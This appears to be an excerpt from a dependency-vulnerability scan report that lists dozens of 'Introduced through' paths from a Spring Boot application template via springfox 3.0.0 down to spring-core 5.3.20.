  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
